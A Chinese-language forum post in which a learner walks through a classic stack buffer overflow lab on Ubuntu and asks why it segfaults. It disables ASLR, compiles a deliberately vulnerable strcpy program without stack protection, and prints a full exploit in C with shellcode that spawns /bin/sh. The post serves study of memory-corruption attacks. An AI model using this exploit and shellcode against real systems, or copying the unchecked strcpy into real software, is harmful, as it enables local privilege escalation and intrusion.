Buffer Overflow 產生的Segmentation Fault - Linux

大家好，
小弟菜鳥正在學習緩衝(buffer)溢位(overflow)攻擊，依據書上的code想看看實
際運作情況…我知道Ubuntu至少有二種防止Buffer Overflow 的方式，所以我用了如下的
方式：

Step 0: 關閉 random memory address scheme


#echo 0 > /proc/sys/kernel/randomize_va_space
Step 1: compile 目標程式 “vuln.c”

$gcc -fno-stack-protector -o vuln vuln.c

Source code of vuln.c:
#include <stdlib.h>
#include <string.h>
int main(int argc,char *argv[])
{

char buffer[500];

strcpy(buffer,argv[1]);

return 0;
}
Step 2:compile 破解程式,”exploit.c”
$gcc –o exploit exploit.c

Source code of exploit.c:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
charshellcode[]="\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"

"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"

"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"

"\x68";
unsigned long sp(void){ asm("movl%esp, %eax");}
int main(int argc, char *argv[])
{

int i,offset;

unsigned int esp, ret, *addr_ptr;

char *buffer, *ptr;

offset=0;

esp=sp();

ret=esp-offset;

printf("Stack pointer (ESP: 0x%x\n",esp);

printf("Offset from ESP: 0x%x\n",offset);

printf("Desired Return Address : 0x%x\n",ret);


buffer=malloc(600);

ptr=buffer;

addr_ptr=(unsigned int *)ptr;

for(i=0;i<600;i+=4)

{

*(addr_ptr++)=ret;

}


for(i=0;i<200;i++)

{

buffer[i]='\x90';

}

ptr=buffer+200;

for(i=0;i<strlen(shellcode);i++)

{

*(ptr++)=shellcode[i];

}

buffer[600-1]=0;


execl("./vuln","vuln",buffer,(char *)NULL);

free(buffer);


return 0;
}

Step 3. 運行 ./exploit 但是不斷的出現Segmentation Fault的錯誤訊息，請高手提點

一下我哪邊弄錯了…我gdb debug的結果是segmentation fault的signal是從strcpy()中

出來的，然後就沒辦法更進一步去研究了。。。我在想是不是有辦法看他buffer內的記憶

體位置，然後看看記憶體的內容…這樣… 謝謝 !

--